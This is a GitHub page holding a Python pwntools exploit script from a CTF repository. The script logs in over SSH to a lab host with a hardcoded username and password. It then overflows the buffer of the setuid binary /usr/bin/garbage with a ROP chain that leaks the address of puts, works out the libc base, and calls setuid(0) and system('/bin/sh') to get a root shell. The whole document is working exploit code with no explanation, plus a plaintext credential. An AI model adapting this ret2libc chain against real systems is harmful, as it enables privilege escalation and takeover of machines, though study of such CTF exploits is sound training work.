ctf_challenges/exploit2.py at master · atalayx7/ctf_challenges · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
context(os='linux', arch='amd64')
s = ssh(host='10.10.10.139', user='margo', password='iamgod$08')
p = s.process('/usr/bin/garbage')

junk = ("A" * 136).encode()
got_puts = p64(0x404028)
plt_puts = p64(0x401050)
plt_main = p64(0x401619)
pop_rdi = p64(0x40179b)
payload = junk + pop_rdi + got_puts + plt_puts + plt_main
p.sendline(payload)
p.recvuntil("denied.")
leaked_puts = p.recv()[:8].strip().ljust(8, b'\x00')
log.info(f'Leaked puts : {leaked_puts.hex()}')

libc_puts = p64(0x809c0)
libc_setuid = p64(0xe5970)
libc_system = p64(0x4f440)
libc_bin_sh = p64(0x1b3e9a)

offset = u64(leaked_puts) - u64(libc_puts)
log.info(f'The offset : {offset}')

setuid = p64(offset + u64(libc_setuid))
system = p64(offset + u64(libc_system))
binsh = p64(offset + u64(libc_bin_sh))
payload = junk + pop_rdi + p64(0) + setuid
payload += pop_rdi + binsh + system

p.sendline(payload)
p.interactive()